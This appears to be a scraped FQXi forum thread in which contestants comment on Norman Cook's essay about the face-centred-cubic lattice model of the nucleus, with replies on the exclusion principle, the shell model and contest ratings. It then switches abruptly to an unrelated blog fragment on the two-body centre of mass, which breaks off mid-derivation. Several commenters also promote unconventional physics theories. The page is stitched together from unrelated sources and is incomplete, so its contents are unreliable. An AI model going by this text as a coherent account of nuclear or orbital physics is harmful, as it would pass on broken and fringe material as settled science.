I hesitate to enter a discussion between two such highly qualified nuclear physicists, but as you note,there are unresolved quantum issues involved.
It is my opinion that the exclusion principle is neither a principle nor a 'force', but a consequence of the physical wave function discussed in my essay, to the effect that the physical wave function of fermions will interfere in such a manner as to preclude their occupying the identically same state.
This model of the nucleon wave function predicts (at the same particle velocity) a physical wave six orders of magnitude weaker than that of the electron, based strictly on mass density. This should be significant from the perspective of de Broglie 'steering' of the particles. Additionally, the associated nuclear model tends to support a lattice structure, or at the very least lattice-based alpha particles.
The model is very new and has no establishment support at the current stage of development, yet at the informal level of FQXi blog comments I feel safe in saying the model supports Dr. Cook's lattice model.
Edwin Eugene Klingman
report post as inappropriate
N.D. Cook replied on Aug. 17, 2012 @ 11:19 GMT
The various models of the nucleus have a long history, going back to the 1930s, and I often refer to the Fermi-gas model, the shell model and the independent-particle model (IPM) collectively as the “gaseous-phase” models. As you note, in fact, their theoretical foundations are quite different. The Fermi-gas model was little more...
view entire post
report post as inappropriate
Ed Unverricht wrote on Jul. 11, 2012 @ 19:03 GMT
In discussing the complexity of the nuclear version of the Schrodinger wave equation, you say "The first is that the nucleus contains two types of nucleon, protons and neutrons, that are distinguished in terms of the so-called isospin quantum number i. The second is the notion of the coupling of orbital angular momentum (l) with intrinsic angular momentum (s) - giving each nucleon a total angular momentum qunatum value (j=l+s)."
Using these ideas and "a strong and short-range nuclear force that acted only among nearest-neighbor nucleons" you show an FCC structure describes a "shell model descriptions of nuclear spins, magnetic moments, shells, subshells and parity states.."
Unfortunately, you also point out "The nuclear lattice does not of course address issues of nucleon substructure or the interpretation of quantum theory itself, and many aspects of quantum 'weirdness' remain enigmas in the lattice."
I liked your essay and learned a lot, especially the clarity the two tables bring to the subject.
There are other models that match the results of these two tables. Consider big thin shells layered on top of each other. Intrinsic angular momentum (s), is modelled as the spin of that shell and orbital angular momentum (l) is modelled as the spin around the axis of the particles precession, which is independent of the intrinsic spin. Animations showing the Larmor frequency of this style of particle can be seen here. Hope you may be so inclined to comment on this.
Thank you for the contribution, a great read.
report post as inappropriate
Norman Cook replied on Oct. 5, 2012 @ 22:25 GMT
Just one comment on your comment!
I remain "agnostic" on most subnucleon issues (quarks, partons and the essence of space-time). Maybe I am just wishy-washy Charlie Brown for that, but I suspect that there are (molecular, atomic and) nuclear structure problems that can and SHOULD BE addressed without postulating explanatory mechanisms from other levels. If they really explain things, that's fine. But if the "explanations" simply shift the puzzle to a different level, they don't solve anything. Conversely, if they are truly explanatory principles - like the Larmor frequency you point out - then the implications should be developed at various levels. Cheers.
report post as inappropriate
M. Asghar wrote on Jul. 12, 2012 @ 12:05 GMT
Dr. Cook.
Thank you for the reaction to my comment on your article. This allows me once more to clarify a few points:
1. The SM potential is not central like for the QED but it is the self-generated single-particle potential due to all the nucleons of the nucleus in which they are supposed to move freely. If it is shown beyond reasonable doubt that the PEP and hard core cannot ensure this unhindered movement, one has to find another reason to understand the validity of this fundamental Model. Since more than 60 years, this SM has been the unassailable source – nay, the raison d’être, with an immense predictive power, for the vast enterprise of Low Energy nuclear physics. Its vast and unique heritage cannot be wished away or pushed down just as a trash (even of the future history) simply by condemning it to be artificial in its conception, because the lack of understanding of something should not make it artificial.
2. The Fcc Lattice Model is an elegant enterprise, but its range of validity remains to be shown on the ground in its own right. Of course, you will not get 10000 PhD students and an unlimited computing power to prove the capacity of this Model. However, as I tried to suggest before, one has to find something that the Lattice Model can treat, but the SM cannot deal with. This seems to be case for the chemically induced cold fusion of D+D and the fission of Pd. Of course, there may some other things too. The uniqueness of these phenomena will be a powerful backing and justification for this Model in its own right.
3. Please avoid these caravans of citations that have a tendency to end up as the truth on the point treated and this does not do any good to anybody. Moreover, these comments have to be made without hankering after any applause and panegyrics. Finally, I am grateful for the opportunity for these objective comments (and elsewhere) and wish all the best for the Fcc Lattice Model and its practitioners.
report post as inappropriate
Lawrence B. Crowell replied on Jul. 12, 2012 @ 16:00 GMT
The Pauli exclusion principle is a quantum topology. The PEP states that ψψ = 0, where we may then see this as a form of d^2 = 0, which is the dual of ∂∂ = 0 (the boundary of a boundary = 0) in topology. This becomes generalized in supersymmetric form with generators Q. The state ψ is such that Qψ = 0, but where ψ =/= Qχ. Therefore the state is ψ \in kerQ/imQ = H^1(Q), which is a cohomology ring.
The PEP permits one to write a large Slater determinant for the wave function composed of the wave function of each nucleon. The potential between each nucleon would be the Yukawa potential
V(r) = Ae^{-λr}/r
The space would then in an equilibrium situation assume an “egg carton” potential function, where each pocket would exist at each nucleon. It would then seem possible to write a numerical program to simulate a nucleus and to determine which of these models is most accurate.
LC
report post as inappropriate
Edwin Eugene Klingman wrote on Jul. 21, 2012 @ 23:06 GMT
Dear Norman Cook,
I'm sure you have enough difficulty swimming against the IPM stream without tying your theory to mine, but I have realized another way in which my theory supports lattice theory. Recall my self-induced flux tube model of the neutron. This model qualitatively explains the eternal(?) life of the proton versus the 800 second life of the neutron, unless the neutron is closely coupled to a nearest neighbor such as in deuterium or an alpha particle. Your lattice would seem to support such nearest neighnbor coupling with consequent extension of neutron stability for billions of years. A 'gas' model of neutrons (in which "the nucleus itself must be considered to be a tiny gas of "point-like" protons and neutrons that freely orbit within the nuclear interior.") in orbit about a central potential well would not extend neutron life at all.
One more reason for me to believe in your model (and in my own.)
Edwin Eugene Klingman
report post as inappropriate
Yuri Danoyan wrote on Sep. 4, 2012 @ 03:23 GMT
Dear Norman Cook,
To my opinion Quantum Nucleodynamics exist only in 2D World.
See my essay with my own Appendix comments
http://fqxi.org/community/forum/topic/1413
report post as inappropriate
Yuri Danoyan replied on Sep. 19, 2012 @ 01:52 GMT
http://resources.metapress.com/pdf-preview.axd?code=dr625064
p1460082&size=largest
report post as inappropriate
Hoang cao Hai wrote on Sep. 19, 2012 @ 13:55 GMT
Dear
Very interesting to see your essay.
Perhaps all of us are convinced that: the choice of yourself is right!That of course is reasonable.
So may be we should work together to let's the consider clearly defined for the basis foundations theoretical as the most challenging with intellectual of all of us.
Why we do not try to start with a real challenge is very close and are the focus of interest of the human science: it is a matter of mass and grain Higg boson of the standard model.
Knowledge and belief reasoning of you will to express an opinion on this matter:
You have think that: the Mass is the expression of the impact force to material - so no impact force, we do not feel the Higg boson - similar to the case of no weight outside the Earth's atmosphere.
Does there need to be a particle with mass for everything have volume? If so, then why the mass of everything change when moving from the Earth to the Moon? Higg boson is lighter by the Moon's gravity is weaker than of Earth?
The LHC particle accelerator used to "Smashed" until "Ejected" Higg boson, but why only when the "Smashed" can see it,and when off then not see it ?
Can be "locked" Higg particles? so when "released" if we do not force to it by any the Force, how to know that it is "out" or not?
You are should be boldly to give a definition of weight that you think is right for us to enjoy, or oppose my opinion.
Because in the process of research, the value of "failure" or "success" is the similar with science. The purpose of a correct theory be must is without any a wrong point ?
Glad to see from you comments soon,because still have too many of the same problems.
Regard !
Hải.Caohoàng of THE INCORRECT ASSUMPTIONS AND A CORRECT THEORY
August 23, 2012 - 11:51 GMT on this essay contest.
report post as inappropriate
Peter Jackson wrote on Sep. 25, 2012 @ 14:39 GMT
Norman
I've just read your essay for the 2nd time, and found the parts I understood very interesting and informative. I've cited the nuclear force derivation of Vladimir analogised with dipoles orbiting a toroid. The nuclear Tokomak and AGN then come into play, neither 'point like' and both with multiple spin axis. Things like Hopft fibration and magnetospheres are in the same family, which critically, are founded on the concept of motion. Could there be any analogy here with your visualisation of lattice nucleodynamics?
I believe your current lowly position shows that possibly the most pertinent part of physics is is too often ignored. I could really do with your input to a mechanism I consider in my own essay which relies on results of charge interaction at a nucleodynamic level. The macro results are astounding, if different to current physics because they work, but the interaction details I work up to may also I hope, give you food for thought. Certainly a good score coming your way whatever, and I hope you agree mine also worth one. I'll value your comments equally.
Many thanks, and best of luck.
Peter
report post as inappropriate
Norman Cook replied on Oct. 5, 2012 @ 22:17 GMT
I have enjoyed your essay too. You have packed a lot into 11 pages and we will have to continue "off line", but my only criticism of your approach is that it covers so much. In your final figure (Fig. 4) seems to be the point from which you can "rebuild" the universe... conceptually similar to Tamari's starting point. I would be curious to see what that implies for the relatively "macroscopic" issues of nuclear structure.
report post as inappropriate
Vladimir F. Tamari wrote on Sep. 29, 2012 @ 09:02 GMT
Hello Norman. This is group message to you and the writers of some 80 contest essays that I have already read, rated and probably commented on.
This year I feel proud that the following old and new online friends have accepted my suggestion that they submit their ideas to this contest. Please feel free to read, comment on and rate these essays (including mine) if you have not already done so, thanks:
Why We Still Don't Have Quantum Nucleodynamics by Norman D. Cook a summary of his Springer book on the subject.
A Challenge to Quantized Absorption by Experiment and Theory by Eric Stanley Reiter Very important experiments based on Planck's loading theory, proving that Einstein's idea that the photon is a particle is wrong.
An Artist's Modest Proposal by Kenneth Snelson The world-famous inventor of Tensegrity applies his ideas of structure to de Broglie's atom.
Notes on Relativity by Edward Hoerdt Questioning how the Michelson-Morely experiment is analyzed in the context of Special Relativity
Vladimir Tamari's essay Fix Physics! Is Physics like a badly-designed building? A humorous illustrate take. Plus: Seven foundational questions suggest a new beginning.
Thank you and good luck.
report post as inappropriate
Juan Ramón González Álvarez wrote on Sep. 29, 2012 @ 17:14 GMT
Dear Norman,
You report the dichotomy between the IPM and LDM models. In a sense this remind me of the old dichotomy between the wave and matrix formulations of quantum mechanics. Both formulations were shown to be finally equivalent. Is there some possibility of that IPM and LDM models can be considered equivalent or quasi-equivalent at least for some range of the nuclear phenomena? For instance, it is possible to relate the long-range potential of the former model with the short-range potential acting only among nearest-neighbour nucleons of the latter; specifically, I have in mind some kind of screening.
And a second question. Can the lattice structure be obtained from the Laplacian of the density in the same way how we can obtain the lattice structure of a solid from the Laplacian of the electronic density?
As August Kekulé wrote: "Let us learn to dream, gentlemen, and then perhaps we shall learn the truth."
Regards
report post as inappropriate
Norman Cook replied on Oct. 5, 2012 @ 22:56 GMT
Hi Juan,
I think the different nucler models are in fact each "correct" in their own way. There should be ways to translate between them, and the fcc lattice is one such translation mechanism.
I have struggled to find a more appropriate expression for the lattice coordinates. Maybe the Laplacian of the 3D structure would connect more directly with experimental data somehow, but I keep returning to the simplicities of 3D solid geometry. The advantage of solid geometry is that it is easy to understand. The disadvantage is that it appears to be "pre-modern" and a crazy attempt to return to the world of earth-fire-and-water and platonic solids. I don't think that is the case, but in fact few nuclear structure theorists have even commented on the strange (but wonderful) identity between nuclear symmetries and fcc symmetries.
Cheers
report post as inappropriate
Vijay Mohan Gupta wrote on Oct. 2, 2012 @ 12:59 GMT
This is a good presentation and continuation of build-up on complex contemporary thought process. In PicoPhysics (current state) we have basics of quantization and integration of contemporary physics (fundamental laws of nature) including that deals with quantum states as well as structure of particles (photons, elementary particles, nucleus, atoms, molecules, matter. and astronomical objects like...
view entire post
report post as inappropriate
Vijay Mohan Gupta wrote on Oct. 2, 2012 @ 21:47 GMT
Dear Norman,
From PicoPhysics perspective, Quantum Nucleodynamics issue concerns Superposition. The energy content per unit Knergy of nucleon is proportional to Knergy density. However, when superposition takes place, it is no more dependant on Knergy density, but partial density of associated Knergy unit. For example an alpha particle have lower energy than 4 individual nucleons if each were occupying one fourth of nuclear real space, due to superposition induced reduction of associated energy.
Though nuclear stability is result of superposition, the factors that affect degree of superposition needs to be worked out by studying the cross-sections for various nuclear reactions. This is time consuming process, and need to be left to next generation.
Even if Quantization or probablistic nature is explained, currently we can answer in general - relative suseptibility of a defined nucleus for a nuclear reaction.
Thanks & Regards,
Vijay Gupta
Proponent - Unary law 'Space Contains Knergy'
report post as inappropriate
Sergey G Fedosin wrote on Oct. 4, 2012 @ 09:24 GMT
If you do not understand why your rating dropped down. As I found ratings in the contest are calculated in the next way. Suppose your rating is
$R_1$
and
$N_1$
was the quantity of people which gave you ratings. Then you have
$S_1=R_1 N_1$
of points. After it anyone give you
$dS$
of points so you have
$S_2=S_1+ dS$
of points and
$N_2=N_1+1$
is the common quantity of the people which gave you ratings. At the same time you will have
$S_2=R_2 N_2$
of points. From here, if you want to be R2 > R1 there must be:
$S_2/ N_2>S_1/ N_1$
or
$(S_1+ dS) / (N_1+1) >S_1/ N_1$
or
$dS >S_1/ N_1 =R_1$
In other words if you want to increase rating of anyone you must give him more points
$dS$
then the participant`s rating
$R_1$
was at the moment you rated him. From here it is seen that in the contest are special rules for ratings. And from here there are misunderstanding of some participants what is happened with their ratings. Moreover since community ratings are hided some participants do not sure how increase ratings of others and gives them maximum 10 points. But in the case the scale from 1 to 10 of points do not work, and some essays are overestimated and some essays are drop down. In my opinion it is a bad problem with this Contest rating process. I hope the FQXI community will change the rating process.
Sergey Fedosin
report post as inappropriate
Sergey G Fedosin wrote on Oct. 5, 2012 @ 16:46 GMT
Dear Norman,
I have some simple models of atomic nuclei in the book: The physical theories and infinite nesting of matter.. Can you look at it and give me feedback?
Sergey Fedosin
report post as inappropriate
Norman Cook replied on Oct. 5, 2012 @ 21:56 GMT
I like your down-to-earth approach to nuclear structure! Binding energies, magnetic moments and quadrupole moments are essential empirical data that any sensible nuclear model must deal with. The smallest nuclei A
report post as inappropriate
Jarek Duda wrote on Oct. 6, 2012 @ 09:39 GMT
Dear Norman,
The model I consider brings some new simple intuitions also to nuclear physics - maybe you will see them interesting. It is a search for configuration of interaction fields building particles - soliton particle model, but not only of single mesons or baryons like Skyrme model, but the ambitious goal is to find a "complete soliton model" - a relatively simple single field which family of local configurations would correspond to the whole particle menagerie and their dynamics. It can be seen as expansion by single dof of Faber's model, which reformulates Maxwell's equations to no longer allow for any charge, but as in nature: only multiplicities of the elemental one (Gaussian law counts topological charge).
Jumping to baryons, their structure in this model enforces some charge-like configuration, but does not require the whole elementary charge - some fraction is enough. So while total charge have to be quantized, locally it can split into quark-like local constructs, but this splitting is energetically costly - what naturally explains why neutron is heavier than proton or what holds deuteron together: proton shares part of its charge with neutron. The picture is on page 7 of my essay.
Do you think these intuitions sound reasonable?
With best regards,
Jarek Duda
report post as inappropriate
Norman Cook replied on Oct. 6, 2012 @ 22:29 GMT
Dear Jarek,
I find your essay to be a very plausible, intuitive way to build up quantum phenomena.
My first impression is that we need something like Tamari's model at the ground level, your model to introduce dynamics, and then something like Paolo Palazzi's summation rules (http://www.particlez.org/p3a/index.html) to get the spectrum of particle masses and lifetimes.
In that view, "nuclear structure" is rather macroscopic, but might be built from those coherent microscopic arguments.
Maybe we can reconstruct the massive edifice of theoretical physics after all!
Cheers
report post as inappropriate
Jarek Duda replied on Oct. 7, 2012 @ 05:42 GMT
Dear Norman,
Thank you very much for your supporting comments. I would love to finally start quantitative consideration, but it is a really tough job: finding the exact Lagrangian combined with performing really difficult numerical simulations. Unfortunately I cannot find cooperation to work on such nonstandard approach, prof. Faber shares the belief of "complete soliton model" existence,...
view entire post
report post as inappropriate
Edwin Eugene Klingman wrote on Oct. 7, 2012 @ 00:40 GMT
Dear Norman,
I was happy to kick you up the list and watch you get into the finalists. I don't really understand the mechanism by which you were knocked out after close of voting, but I know you belong there. I very much appreciated your essay and hope you will enter another one next year.
Best regards,
Edwin Eugene Klingman
report post as inappropriate
Edwin Eugene Klingman wrote on Oct. 12, 2012 @ 18:36 GMT
Dear Norman Cook,
In a comment to Rob McEachern you remark that, " I too have a small collection of journal referee comments stating that my nuclear model is "inconsistent with the uncertainty principle" and therefore "not quantum mechanical" and therefore simply wrong - no matter what kind of agreement with experimental data is found."
You may find that your approach to the uncertainty principle receives some support in Physical Review Letters 109, 100404 (7 Sept 2012) in which the authors experimentally observe a violation of Heisenberg's "measurement-disturbance relationship" and demonstrate Heisenberg's original formulation to be wrong. I hope this is of some relevance to you.
Also, the same issue contains another paper, #103401, which addresses yet another approach to the 4% discrepancy in the proton radius determined by muonic-hydrogen experiments. They conclude that they have refuted all reasonable hypotheses aiming to resolve the "proton radius puzzle" with the help of three-body physics. Although I have not yet quantitatively solved this problem, my proton model is qualitatively consistent with reality.
Best wishes,
Edwin Eugene Klingman
report post as inappropriate | 2020-12-03 07:17:14 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 12, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4640820622444153, "perplexity": 2016.517837283127}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-50/segments/1606141723602.80/warc/CC-MAIN-20201203062440-20201203092440-00654.warc.gz"} |
https://papers.nips.cc/paper/2020/hash/174f8f613332b27e9e8a5138adb7e920-Abstract.html | #### Authors
Yunbei Xu, Assaf Zeevi
#### Abstract
<p>We study problem-dependent rates, i.e., generalization errors that scale tightly with the variance or the effective loss at the "best hypothesis." Existing uniform convergence and localization frameworks, the most widely used tools to study this problem, often fail to simultaneously provide parameter localization and optimal dependence on the sample size. As a result, existing problem-dependent rates are often rather weak when the hypothesis class is "rich" and the worst-case bound of the loss is large. In this paper we propose a new framework based on a "uniform localized convergence" principle. We provide the first (moment-penalized) estimator that achieves the optimal variance-dependent rate for general "rich" classes; we also establish improved loss-dependent rate for standard empirical risk minimization.</p> | 2021-03-01 03:43:28 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8359276056289673, "perplexity": 1605.9295833749468}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-10/segments/1614178361849.27/warc/CC-MAIN-20210301030155-20210301060155-00623.warc.gz"} |
https://www.physicsforums.com/threads/average-of-an-array.49913/ | Average of an array
1. Oct 27, 2004
kishtik
Is limit of an array average of its terms?
2. Oct 27, 2004
arildno
This is incomprehensible; what do you mean by the term "limit", is "average" arithmetic average, is "array" meant to denote an array of numbers like a vector or matrix?
3. Oct 27, 2004
HallsofIvy
I would be willing to assume that "array" means just a list of numbers and that "average" is the mean or arithmetic average but I still have no idea what you mean by the "limit" of an array. The limit as what variable goes to what?
4. Oct 27, 2004
kishtik
Sorry!
Suppose (an)=(a1, a2, ..., an) is a function from N+ to R ("array"), "average" can be both arithmetic and geometric, "limit" is the limit of this function while n->infinity. | 2018-06-22 12:02:12 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8012174367904663, "perplexity": 1445.077414161604}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-26/segments/1529267864391.61/warc/CC-MAIN-20180622104200-20180622124200-00344.warc.gz"} |
https://allenergetics.com/wind-energy/how-many-blades-do-i-need-for-a-wind-turbine | No account? Create here!
All articles > Wind energy > How many blades do I need for a wind turbine?
Serhii Korneliuk4 Oct, 2019 • 4 minutes of reading
## How many blades do I need for a wind turbine?
600Wind energy
It would seem like a simple question. Most will answer, "Take 3 shovels and do not giggle," and the question "Why so?", All the same will give an answer, saying that large windmills with three blades are not stupid, the same people do.
And let's take a closer look at this issue.
The main operation of the windmill is due to the deceleration of the air flow, the larger the area of the wind wheel (the larger the number of blades), the greater the slowing down of the flow. "Eureka", shout some, we take a lot of blades and stop the wind. This is exactly what they do in the desert regions of the US and Australia. They use a multi-blade (about 24 blades) windmills to lift the water.
For wind turbines, such windmills are not suitable because they have a low speed of about 1.
Speed $\mathbit{Z}$ - wind generator, is the ratio of the circumferential velocity of the end of the blade ($\mathbit{\omega }\mathbit{R}$) to the speed of the incoming air stream ($\mathbit{v}$):
$\mathbit{Z}\mathbit{=}\frac{\mathbit{\omega }\mathbit{R}}{\mathbit{v}}$
The slow-moving effect is due to the fact that at a certain wind speed, the blades seem to interfere with each other due to their turbulence, changing the direction of air flow. And at certain speeds such windmill slows itself. From here we see that many bladed windmills do not give much spin, so these windmills are used where you do not need high speed.
In turn, small bladed windmills have a high speed, reaching 12 units in single-blade wind turbines.
Of course, speed depends not only on the number of blades, but also on the blade profile and its performance. So, for example, a full-profile blade made without flaws has a higher speed ratio than a semi-profile blade, or a blade with a rough surface.
So why not use a single-blade windmill for wind turbines? Here comes another parameter called Gyroscopic torque.
Wind is not a constant value not only in its speed but also in the direction, which makes the wind turbine practically always works in dynamic mode constantly changing its direction. At this time, the screw rotates, and it is known that any rapidly rotating body seeks, like a whirlwind, to keep the direction of its axis of rotation unchanged, and counteracts any attempt to reject this axis. If you force the end of the axis to deviate in either direction, it will resist, and its end will go in the direction perpendicular to the impact. This is called gyroscopic torque, its value depends on the mass, diameter and rotation of the screw. I will remind, the mass of blades also grows with increase of turns at the expense of centrifugal force.
And as the power of the screw depends a little on speed, then choose such configuration of blades at which gyroscopic now not so much, and turns, at it's not that small.
Three wind blades are such a compromise for wind turbines. The speed ratio is about 6 to 7 units on average.
### Similar publications:
Wind energy
More details
Wind energy
More details
Wind energy
More details
Wind energy
#### #4 / Windmill «NoName-1» / gluing magnets the first stage / sticking / sound generator
More details
We use cookies to personalise content and ads, to provide social media features and to analyse our traffic. We also share information about your use of our site with our social media, advertising and analytics partners who may combine it with other information that you’ve provided to them or that they’ve collected from your use of their services | 2021-07-24 13:04:47 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 4, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.6704825758934021, "perplexity": 1304.2836624310382}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-31/segments/1627046150266.65/warc/CC-MAIN-20210724125655-20210724155655-00512.warc.gz"} |
https://math.stackexchange.com/questions/3263796/homotopy-colimit?noredirect=1 | # Homotopy colimit
Some time ago I asked this question. I am trying again to get an understanding of the definition of the homotopy colimit of a diagram of topological spaces.
One of the answers at the above says
For example, homotopy colimits represent "homotopy coherent cones"
referring me to papers by Michael Shulman and Emily Riehl for the definitions.
I am finding difficulty with the high level of generality of the definitions in both of these sources. My first question is whether there is a simpler definition of a homotopy coherent cone when it is over a finite diagram of CW-topological spaces - in particular where the maps are all cofibrant inclusions?
I am particularly interested in whether my following intuition is correct:
A homotopy coherent cone on a diagram is one such that we do not necessarily have commutativity, but we have commutativity up to homotopy, and then commutativity of those homotopies up to homotopy, and then commutativity of those up to homotopy, etc.
If this is not correct, is there a similar intuition available for homotopy coherent cones? | 2020-06-04 21:01:58 | {"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8672841191291809, "perplexity": 280.49481649688505}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-24/segments/1590347458095.68/warc/CC-MAIN-20200604192256-20200604222256-00049.warc.gz"} |
https://www.wptricks.com/question/custom-post-types-how-to-add-query-args-to-links-to-cpt-admin-submenu/ | Question
I have a custom post type I’ve created, and I’ve added an admin submenu page to display some data it generates. So far, so good. I’m displaying the data with my local extension of WP_List_Table, and I want one of the columns to link to a detailed view of the item in the row. So,
add_submenu_page('edit.php?post_type=cwr_ticket_page',
__( 'Tickets', $this->plugin_text_domain ), // page title __( 'Sold Tickets',$this->plugin_text_domain ), // menu title
array( $this, 'load_ticket_list_table' ) // callback “Sold Tickets” correctly shows up as a sub-menu on my “Ticket Pages” admin menu. The resulting url is http://localhost:8181/wp-admin/edit.php?post_type=cwr_ticket_page&page=cwr-tickets, and that page correctly renders my table, all nicely using WP styles, with sortable columns and pagination, etc…. But one of my columns is “Details” and I want it to contain a link to a deeper view of the data represented in the given row. So for the entries in my “Details” column, I want something like <a href="http://localhost:8181/wp-admin/edit.php?post_type=cwr_ticket_page&page=cwr-tickets&view=details&ticketID=abc123">view</a> The question is, how to build that URL. I thought I could use add_query_arg, but it’s behaving oddly. My column_default method override looks like this: public function column_default($item, $column_name ) { switch ($column_name ) {
...
case 'details':
$args = array ( 'view' => 'details', 'ticketID' => '12345' //placeholder for development ); return '<a href="' . esc_url( add_query_arg($args,
menu_page_url( 'cwr-tickets', false ) ) )
. '">View</a>';
...
}
}
I’ve tried it both with and without the esc_url wrapper, but either way, it ends up moving the existing page query arg to the end, and prepending it with #038; instead of the ampersand. That is, I get
<a href="//localhost:8181/wp-admin/edit.php?post_type=cwr_ticket_page&views=details&ticketID=12345#038;page=cwr-tickets">View</a>
By the way, I’m in no way wed to this use of menu_page_url and add_query_arg; the question is, how to (properly / the WordPress way) construct this CPT admin submenu URL for the links?
0
1 month 2022-07-14T09:12:54-05:00 0 Answers 0 views 0 | 2022-08-18 10:06:12 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4758792817592621, "perplexity": 4309.025548038168}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-33/segments/1659882573193.35/warc/CC-MAIN-20220818094131-20220818124131-00668.warc.gz"} |
http://ericdoesastrophysics.blogspot.com/2011/11/ | # Two-Body Orbits: Where's The Centre of Mass?
Second Authors: Nathan, Lauren
Introduction
Consider a problem of a planet orbiting a star. It's easy to see from Newtonian gravitation that they exert a force on one another. But then, how, according to Kepler's Third Law can we say the planet orbits the star alone? The star cannot remain fixed while feeling a force. In order for Newton's Laws to hold, we must say that they both orbit a mutual centre of mass. Using conservation of momentum, we can determine how far each body truly is from this centre of mass.
Methods
In order to balance forces, we notice that the planet and the star must be at opposite ends of their orbits at all times as seen in the following picture (not to scale). It follows from this that they have the same orbital period and the same angular velocity.
We know that linear momentum is equal around the centre of mass, such that:
$m_{p}v_{p}=m_{*}v_{*} \\ m_{p}a_{p}\omega=m_{*}a_{*}\omega$
Dividing through, we get the relationship
$\frac{m_{p}}{m_{*}}=\frac{a_{*}}{a_{p}}$
Rearranging and using the mean semimajor axis, a, we can see that
